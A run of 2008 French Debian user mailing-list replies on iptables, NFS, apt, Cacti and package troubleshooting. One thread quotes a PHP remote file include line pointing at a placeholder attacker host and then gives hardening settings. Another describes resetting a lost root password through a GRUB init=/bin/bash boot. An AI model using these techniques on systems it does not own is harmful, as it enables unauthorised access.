-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jean-Christophe wrote: J'ai trouvé les dépôts nightly builds de vlc (http://nightlies.videolan.org/): deb http://nightlies.videolan.org/build/sid-i386/arch ./ si ça intéresse quelqu'un, avec la version 0.9 de vlc Autrement tu peux utiliser ffplay du package ffmpeg :) - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhb9VUACgkQxJBTTnXAif4vWwCguFQDRkNs3InwmSkh4J3daqKX isMAn1fyzQJPbrOsZR5xALicCxxCyG/e =h7/V -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: APT et proxy
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jean-Yves F. Barbier wrote: Franck Joncourt a écrit : BmailDB wrote: [...] apt fonctionne, mais régulièrement, dans les logs du parefeu, j'ai des DROP de cette machine vers 88.198.169.140 port 80. Il semblerait que ce soit debian.netcologne.de Comment est-ce que tu en déduis cela ? il ne déduit pas, il suppute: nslookup debian.netcologne.de Server: 127.0.0.1 Address:127.0.0.1#53 Non-authoritative answer: Name: debian.netcologne.de Address: 81.173.192.234 c'est ptêt une supputation vendrediesque ;-) Oui, j'avais posé la question car je ne comprenais pas comment il en arrivait là :p Du coup, je n'avais mentionné aucune commande. Bonne journée. - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhYqXIACgkQxJBTTnXAif6qkACgialQYKgR+s1GcLbxRzFqMslO /08AoKDTmYFaGwfVqqiZikUfm/QVZszy =RJNT -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Comment restreindre les flux réseau via un p roxy ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sylvain Sauvage wrote: Franck Joncourt, mardi 17 juin 2008, 00:51:58 CEST [...] Non, non, c’est ta faute, la preuve en archive : http://lists.debian.org/debian-user-french/2008/06/msg00390.html Il n’est pas dans mon texte, juste dans le tien. Peut-être un ou deux ^H oubliés quand tu as fondu les deux règles… En effet. C'est étrange quand je regarde le message envoyé (dossier Sent de icedove), il est correctement formaté. Dans tous les cas la faute est là. [...] Ca sent le manque de pratique, va falloir s'y remettre sérieusement :) Ou alors trop d’autres pratiques (et glou et glou…) ;oP ? - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhX8JAACgkQxJBTTnXAif73qQCgljEbQ2GrHG3FTKMB4gp51DHs fa0AoNH5oG1MBDr1Wy4ax41hqcvCLBtm =mnst -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
iptables : table nat / nouvelles connexions
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Salut, Salut, Franck Joncourt a écrit : Tu peux omettre --syn vu que la table nat ne vois passer que les paquets créant __les nouvelles connexions__. Les chaînes de la table nat ne voient passer que les paquets créant une nouvelle connexion, mais au sens du suivi de connexion de Netfilter (conntrack), qui n'a pas les mêmes critères que la pile TCP/IP. Selon la version du noyau et la valeur de certains paramètres du noyau, un paquet TCP non SYN peut très bien créer une nouvelle connexion au sens du suivi de connexion de Netfilter. En gros avec : - un noyau antérieur à 2.6.9 (sans suivi des numéros de séquence TCP) - ou avec /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_be_liberal=1 - ou avec /proc/sys/net/netfilter/nf_conntrack_tcp_be_liberal=1 n'importe quel segment TCP peut créer une nouvelle connexion. J'ai bien vu ces options mais je ne m'y suis jamais attardé. Sur la liste Netfilter certaines personnes l'activaient mais je ne me souviens plus de la raison exacte. Après avoir creusé un peu plus, il semble que ce soit pour éviter de considérer les paquets qui sont hors de la fenêtre tcp comme INVALID (au sens suivi de connexion) Dans quel(s) cas cette option __tcp_be_liberal__ a-t-elle un intérêt ? En d'autres termes, pourquoi devrait-on accepter ces paquets ? iptables -t nat -A OUTPUT -p tcp --dport 80 -m owner --uid-owner nobody - -j REDIRECT --to-port 8080 Il ne manquerait pas un ! quelque part pour inverser la condition owner ? Je me suis planté ... :(! Merci pour la mise au point. Petite note au passage : si tu veux t'amuser un peu il y a deux nouvelles librairies perl pour la manipulation des règles iptables qui sont arrivées dans le dépôt Debian : libiptables-parse-perl et libiptables-chainmgr-perl. - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhX+KgACgkQxJBTTnXAif4WvACgr0sR/ddQSyguZeoRdEDaNYa6 f7MAoMagWO/Ih99ytWAAm3mG/ot5EsDF =LN6O -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: APT et proxy
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 BmailDB wrote: Bonjour, Bonsoir, [...] apt fonctionne, mais régulièrement, dans les logs du parefeu, j'ai des DROP de cette machine vers 88.198.169.140 port 80. Il semblerait que ce soit debian.netcologne.de Comment est-ce que tu en déduis cela ? - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhX+7wACgkQxJBTTnXAif4OJQCgq633vFCv0ugUKXFh03mqRbEz VgYAoKpTJ5DZisCCwxzgX7bkvc8iMlwe =A8YM -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: montage nfs ne marche pas
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Franck Delage wrote: Salut à tous. Salut, [...] Un ordi fixe dont l'adresse sur le réseau est 192.168.1.101. Un ordi portable dont l'adresse est 192.168.1.102. Le but est de partager le /home/franck de mon fixe et de le monter sur /mnt/franck sur le portable. donc, mon fichier /etc/exports sur le fixe : /home/franck 192.168.1.102(rw) Mets plutôt quelque chose de ce genre : /nfs/export 192.168.1.102/255.255.255.0(rw,sync,all_squash,anonuid=1001,anongid=1002) afin de rediriger toutes les requêtes vers l'utilisateur dont l'uid est 1001 et le gid est 1002. je fais exportfs -a la commande rpcinfo -p me donne : 102 tcp 111 portmapper 102 udp 111 portmapper 132 udp 2049nfs 133 udp 2049nfs 134 udp 2049nfs 132 tcp 2049nfs 133 tcp 2049nfs 134 tcp 2049nfs 1000211 udp 32768 nlockmgr 1000213 udp 32768 nlockmgr 1000214 udp 32768 nlockmgr 1000211 tcp 32768 nlockmgr 1000213 tcp 32768 nlockmgr 1000214 tcp 32768 nlockmgr 1000241 udp 32765 status 1000241 tcp 32765 status 151 udp 891 mountd 151 tcp 894 mountd 152 udp 891 mountd 152 tcp 894 mountd 153 udp 891 mountd 153 tcp 894 mountd On peut spécifier des ports différents pour le tcp et mountd ? La dernière fois que j'ai mis cela en place, j'ai fais fonctionner mountd sur le port 32767 avec la ligne suivante dans le fichier /etc/default/nfs-kernel-server [code] RPCMOUNTDOPTS=-p 32767 [/code] Puis, sur le portable, je fais mount -t nfs 192.168.1.101:/home/franck /mnt/franck et dans fstab je spécifiais : [code] 192.168.1.101:/home/franck /mnt/franck nfs rw,hard,intr,noauto00 [/code] Et invariablement, la réponse est : mount to NFS server '192.168.1.101' failed: server is down. Vérifies que les services sont bien en écoutes : # netstat -ltu Vérifies tes fichiers hosts.allow et hosts.deny sur le serveur: Par exemple : __/etc/hosts.allow__ [code] portmap: 192.168.1.102 lockd: 192.168.1.102 mountd: 192.168.1.102 rquotad:192.168.1.102 statd: 192.168.1.102 [/code] __/etc/hosts.deny__ : [code] portmap: ALL lockd: ALL mountd: ALL rquotad:ALL statd: ALL [/code] Tu peux aussi vérifier que ton dossier est correctement exporté : # showmount -e Avec le suivi de connexion de iptables, tu autoriseras sans problème les connexions de types ESTABLISHED en INPUT/OUTPUT. Ensuite il ne te reste qu'à accepter le traffic entrant sur ton serveur pour les différents services : portmap -- 111 nfs -- 2049 mountd, statd[-bc], lockd et quotad suivant les ports fixes que tu as définis. Je ne me rappelle plus si portmap et nfs fonctionne maintenant en tcp, plutôt qu'en udp. Pour les autres je les laissaient en tcp/udp mais il faudrait que je reinstalle pour vérifier. Il a été mentionné des règles iptables auxquelles j'ajouterais, si tu veux faire du ménage : iptables -t nat -F iptables -t nat -X Pour la table mangle, je n'ai jamais vu du filtrage à ce niveau, donc je dirais pas besoin de la flusher pour toi, mais ce serait plus propre. L'état de la chaîne FORWARD n'a que peu d'intérêt dans ton cas. Tu peux jouer à coup de netcat sur chacun des ports pour faire des tests si tu n'es pas certains de toi. $ nc -z -v -w 2 192.168.1.101 111 2049 par exemple. - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhWy30ACgkQxJBTTnXAif6/DACgtBJ8iukim8A40XJLOG5OGPFg hkoAoKyuBThs5egGwaOWc0cXC58cu3Ma =Mme/ -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Comment restreindre les flux réseau via un p roxy ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sylvain Sauvage wrote: David BERCOT, lundi 16 juin 2008, 20:47:11 CEST ’soir, Bonsoir, [...] Ça s’appelle un proxy transparent. Il suffit de rediriger tout ce qui doit passer par le 80 vers le proxy. : iptables -t nat -A PREROUTING -p tcp --syn --dport www -j REDIRECT --to-port 3128 Tu peux omettre --syn vu que la table nat ne vois passer que les paquets créant __les nouvelles connexions__. Sauf que là, ça ne marchera pas : en général, un proxy transparent n’est pas sur la machine d’où sont issues les requêtes. Or les requêtes locales ne passent pas par PREROUTING, seulement par OUTPUT. Donc : iptables -t nat -A OUTPUT -p tcp --dport www -m owner --uid-owner nobody -j ACCEPT iptables -t nat -A OUTPUT -p tcp --dport www -j REDIRECT --to-port 8080 Et la je pencherais pour le tout dans la même règle. iptables -t nat -A OUTPUT -p tcp --dport 80 -m owner --uid-owner nobody - -j REDIRECT --to-port 8080 vu que le ACCEPT, je pense, à plus sa place dans la table filter. - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhW0SsACgkQxJBTTnXAif4TlQCcDjZdlMnRcih3XbeHcZ3U07Tw IfEAn1arrXlaT0pKsql8kqIeGGp9pIQG =mpz6 -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Comment restreindre les flux réseau via un p roxy ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sylvain Sauvage wrote: Franck Joncourt, lundi 16 juin 2008, 22:46:35 CEST [...] iptables -t nat -A OUTPUT -p tcp --dport 80 -m owner --uid-owner nobody - -j REDIRECT --to-port 8080 vu que le ACCEPT, je pense, à plus sa place dans la table filter. Mmm, donc le « - » servirait à inverser la condition ? Ce n’est pas dans ma page de man. D’habitude c’est « ! » pour la négation et elle n’est pas indiquée pour owner. En tout cas, si c’est ça, je trouve le « - » facilement ratable. Sinon, je ne vois pas trop… C'est toi qui l'a rajouté ? On dirait une coupure de ligne :p! [code] iptables -t nat -A OUTPUT -p tcp --dport www -m owner --uid-owner nobody - -j ACCEPT iptables -t nat -A OUTPUT -p tcp --dport www -j REDIRECT --to-port 8080 [/code] Oups. Je ne sais pas pourquoi j'ai imaginé que l'on continuait après le ACCEPT. Ca sent le manque de pratique, va falloir s'y remettre sérieusement :) - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhW7o4ACgkQxJBTTnXAif79lwCeNkheG5xyDSU3q0KVlupi7MYR 4SQAoKiflgfu4tfnQXm9mLEiHZ27Psmp =1ceo -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [resolu] awstats (innocenté), sarg e, intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 François Boisson wrote: Le Thu, 5 Jun 2008 20:51:49 +0200 François Boisson [EMAIL PROTECTED] a écrit: Salut, En fait c'est extrèmement simple: un include(http://monsite.labas.pirate/scriptdelamort.quitue;); télécharge le script sur le site ET l'éxécute comme un script PHP. À partir de là on fait ce qu'on veut. Donc effectivement c'est relativement simple. Je n'aurais pas pensé que include faisait un tel chargement sur des sites extérieurs. C'est une fonction assez dangeureuse. Dans la configuration php : $register_globals = Off pour éviter que le client passe des valeurs à des variables non initialisées. $allow_url_include = Off pour éviter de traiter des urls style http ou ftp dans les include. Cela devrait t'éviter des problèmes similaires :p! Bonne journée. - -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhKRIUACgkQxJBTTnXAif7GswCfQfvb1slfkx5cYS7Y1EckT8ws tFMAn0XQGy+8b11v3Br/yu0spPYEEhRy =8XRz -END PGP SIGNATURE- -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: récupérer mot de passe root sur Linu x en mode virtuel
Bonjour, [...] Je suppose que tu as bien un Grub qui tourne sur ta machine virtuelle. Donc tu édites la ligne kernel de ton grub : [code] kernel ... rw init=/bin/bash [/code] tu boot dessus [code] # passwd # sync [/code] Tu redémarres la machine virtuelle et le tour est joué. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: récupérer mot de passe root sur Linu x en mode virtuel
Jacques L'helgoualc'h a écrit : [...] Tu redemarres la machine virtuelle et le tour est joue A faire sous Linux virtuel ? Mais comment editer le kernel de mon grub, vu que je n'ai pas acces au root. (mot de passe root perdu) La configuration du Grub est en général dans /boot/grub/menu.lst ; si ce fichier n'est pas trouvé, on peut aussi éditer (taper « c ») la ligne de commande grub, du moins quand la phase Grub de la séquence de démarrage en laisse le temps... Sinon, il suffit peut-être de corriger la commande VMWare utilisée, en ajoutant les options « rw init=/bin/bash » données par Franck à la fin de la ligne lançant le noyau Linux. Moi je tape 'e' à l'invite grub au démarrage pour modifier les paramètres. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: connexions multiples
Frederic Beck a écrit : Bonjour, Bonsoir, [...] Par contre, il me reste un petit soucis au niveau des DNS. Comme ils sont différents, et que j'ai du DHCP sur les 2 interfaces, je me retrouve toujours avec les serveurs de l'une des 2 connections uniquement dans mon resolv.conf. J'aimerais pouvoir faire le même style de redirection que précédemment mais pour les DNS, c'est à dire que chaque interface interroge bien le DNS qui correspond à son ISP. Quelqu'un sait ou et comment je peux configurer ca ? [...] J'aurais installé Bind et créer deux zones avec des forwarders différents : http://www.dthconnex.com/dns_server.html http://www.dthconnex.com/dns_dhcp.html Je ne sais pas si c'est la meilleure solution mais c'est une idée :p! -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
ulogd-pcap et tcpdump
Bonsoir, Ayant installé ulogd et son plugin ulogd-pcap, je rencontre un petit problème de format dans le fichier de dump de ulogd. ulogd me crée un fichier pcap.log, et je veux le relire avec une librairie perl libnet-pcap-perl (Net::Pcap::open_offline). J'obtiens l'erreur suivante : __bad dump file format__ tout comme lors de l'utilisation de tcpdump pour relire ce même fichier. Pour l'instant je n'ai trouvé que cette piste : http://www.mail-archive.com/[EMAIL PROTECTED]/msg00892.html Des idées ? --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Projet de Programmation Debian
On Thu, 15 May 2008 21:00:31 +0200, .:: Alfred Sawaya ::. [EMAIL PROTECTED] wrote: Serge Cavailles a écrit : Bonjour, Bonsoir, [...] Hmm... Je pensais plutôt à une lib avec les fonctions de nmap et notamment les fonctions de découverte de l'OS sur la machine cible... Ca existe ? Et bien tout simplement : # apt-get source nmap En fouillant un tout petit peu tu trouveras ton bonheur :p! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: OupSSH
Salut, On Tue, 13 May 2008 22:53:08 +0200, Sylvain Sauvage [EMAIL PROTECTED] wrote: Sylvain Sauvage, mardi 13 mai 2008, 22:41:03 CEST ’soir, gros pépin avec openssl (et donc avec openssh) […] D’autres infos sur http://wiki.debian.org/SSLkeys Merci pour l'info, --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Logcheck - Swatch
Bonsoir, J'étais en train de regarder du côté de swatch pour mettre en place des expression régulières afin de l'interfacer avec psad, quand je suis tombé sur le fil sur logcheck. Alors suivant les informations fournies par apt, il semble que logcheck renvoie ces résultats par email, mais est-il possible de lui dire d'exécuter des actions spécifiques (lancement d'un script) lorsqu'il matche certaines regexp ? Pour ce qui est de swatch, j'allais le tester quand j'ai remarqué que le paquet Debian n'était pas à jour. Je suis donc allé chercher la dernière mouture sur sourceforge afin de l'empaqueter, et là je n'ai pas trouvé de fichier me donnant les différences avec la dernière version. D'où mon autre question, quand est-il de l'activité de swatch ? Une dernière pour la route : Qu'utilisez vous comme programme tiers pour détecter les tentatives d'instrusion au niveau de l'authentification des services ? Je ne cherche pas un programme qui mette à jour mes règles iptables, psad s'en charge déjà très bien. L'utilisation du match recent pour bloquer certaines ips trop gourmandes en requêtes n'est plus suffisante, et l'utilisation du port-knocking ou SPA ne peut-être appliquée à tous les services afin d'en restreindre l'accès. Merci d'avance. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: probleme installation driver ati 9600 sur lenny
Bonjour à tous, Bonsoir, j'ai un probleme pour installer le dernier driver pour ma carte ati 9600 pro, j'ai fait la commande suivante : sh ati-driver-installer-8-3-x86.x86_64.run --buildpkg Debian/lenny voici la fin du message d'erreur: [...] dh_makeshlibs dh_shlibdeps dpkg-shlibdeps: failure: no dependency information found for /lib/libc.so.6 (use dh_shlibdeps: command returned error code 512 make: *** [binary] Error 1 dpkg-buildpackage: failure: debian/rules binary gave error exit status 2 Removing temporary directory: fglrx-install.r16524 As tu un fichier /var/lib/dpkg/info/libc6.shlibs ? Je pense qu'il recherche la liste des dépendances de libc6 sur ton système afin de créer le paquet. Sur ma sid : $ cat /var/lib/dpkg/info/libc6.shlibs ld-linux-x86-64 2 libc6 (= 2.7-1) libanl 1 libc6 (= 2.7-1) libBrokenLocale 1 libc6 (= 2.7-1) libc 6 libc6 (= 2.7-1) libcidn 1 libc6 (= 2.7-1) libcrypt 1 libc6 (= 2.7-1) libdl 2 libc6 (= 2.7-1) libm 6 libc6 (= 2.7-1) libnsl 1 libc6 (= 2.7-1) libnss_compat 2 libc6 (= 2.7-1) libnss_dns 2 libc6 (= 2.7-1) libnss_files 2 libc6 (= 2.7-1) libnss_hesiod 2 libc6 (= 2.7-1) libnss_nis 2 libc6 (= 2.7-1) libnss_nisplus 2 libc6 (= 2.7-1) libpthread 0 libc6 (= 2.7-1) libresolv 2 libc6 (= 2.7-1) librt 1 libc6 (= 2.7-1) libthread_db 1 libc6 (= 2.7-1) libutil 1 libc6 (= 2.7-1) --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: probleme installation driver ati 9600 sur lenny
On Fri, 28 Mar 2008 21:32:26 +0100, petit fabien [EMAIL PROTECTED] wrote: [...] Bon et bien si un __dpkg -S libc.so.6__ te retourne libc6 je n'ai plus d'idée :p! PS : évites les mails en double, triple ... Merci! --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: probleme installation driver ati 9600 sur lenny
[...] Bon et bien si un __dpkg -S libc.so.6__ te retourne libc6 je n'ai plus d'idée :p! On Fri, 28 Mar 2008 21:51:51 +0100, petit fabien [EMAIL PROTECTED] wrote: # dpkg -S libc.so.6 dpkg-query: la liste des fichiers pour le paquet « libwine-gphoto2 » contient un nom de fichier vide qu'est ce que le package libwine-gphoto2 a à voir ici ? , comprends pas Le fait que tu est supprimé ton répertoire info pour dpkg !! Je ne sais pas regénérer les infos de dpkg, alors je serais toi je sortirais ma boîte à outils pour virer le paquet libwine-gphoto2 de dpkg status ou modifier le fichier list du fichier précédent pour y placer un nom de fichier valide. Faire quelque chose de genre pour s'en sortir. J'espère que cela ira mieux ensuite et qu'il n'y a pas d'autres erreurs du même gout. PS2 : merci pour les mails en privé mais ce n'est pas nécessaire ... --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: créer un apache chrooté et un apache non-chrooté
On Wed, 19 Mar 2008 11:45:45 +0100, mess-mate [EMAIL PROTECTED] wrote: Bonjour, Bonsoir, comment peut-on crééer 2 apaches (etch) dont 1 chrooté et 1 non-chrooté ? Le chrooté pour l'accès par internet, le non-chrooté pour accès par le lan. Quelqu'un peut me mettre sur la voie ou m'indiquer un tuto dans ce sens ? http://www.sosadd.info/doku.php?id=apache2modmacro http://blog.adaniels.nl/?p=13 http://g-rossolini.developpez.com/tutoriels/logiciels/plusieurs-apache-simultanes/ Cela devrait aider je pense, au moins à créer deux instances. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re : [etch]Cacti + windows XP SP2
On Tue, 18 Mar 2008 12:05:24 + (GMT), Dominique Claver KOUAME [EMAIL PROTECTED] wrote: Bonjour, Bonjour, Merci pour le topo, juste une erreur de communauté. Par contre là mes graphes ne sont pas visibles sur la page. C'est un peu comme quand une image ne s'affiche pas sur une page web. Dans mes notes je retrouve cela : # chown -R www-data:www-data /usr/share/cacti/site/log (lien symbolique sur /var/log/cacti) # chown -R www-data:www-data /usr/share/cacti/site/rra (lien symbolique sur /var/lib/cacti/rra) Si ce n'est pas celà, je n'ai pas trop d'idées. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re : [etch]Cacti + windows XP SP2
On Tue, 18 Mar 2008 14:31:24 + (GMT), Dominique Claver KOUAME [EMAIL PROTECTED] wrote: Merci encore une fois de plus ça marche perfecto. Dis, tu ne saurais pas comment je pourrais faire de très belles cartes de mon réseau avec le plugin weathermap dans Cacti ? Non. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [etch]Cacti + windows XP SP2
On Mon, 17 Mar 2008 15:13:56 + (GMT), Dominique Claver KOUAME [EMAIL PROTECTED] wrote: Bonjour à tous, Bonsoir, Je viens d'installer Cacti sur Debian Etch et installé le service SNMP de Windows XP SP2. Malheureusement quand je crée un graphe pour avoir les infos de ma machine Win. J'ai un petit message en rouge sur la page d'admin de Cacti disant: SNMP error. Merci de m'aider à bien configuré l'ensemble pour les faire marcher. A terme je dois pouvoir grapher toutes les devices de mon réseau. La dernière fois que j'y ai touché cela venait des droits de l'agent snmp. Dans /etc/snmp/snmpd.conf : com2sec readonly default public Autrement tu peux jouer avec snpmwalk (man snmpwalk) Pour avoir des infos de la part de cacti tu peux regarder dans la catégorie Management, sous catégorie Devices et demander une Verbose query pour avoir de infos supplémentaires. --- Franck Joncourt http://www.debian.org/ - http://smhteam.info/wiki/ -- Lisez la FAQ de la liste avant de poser une question : 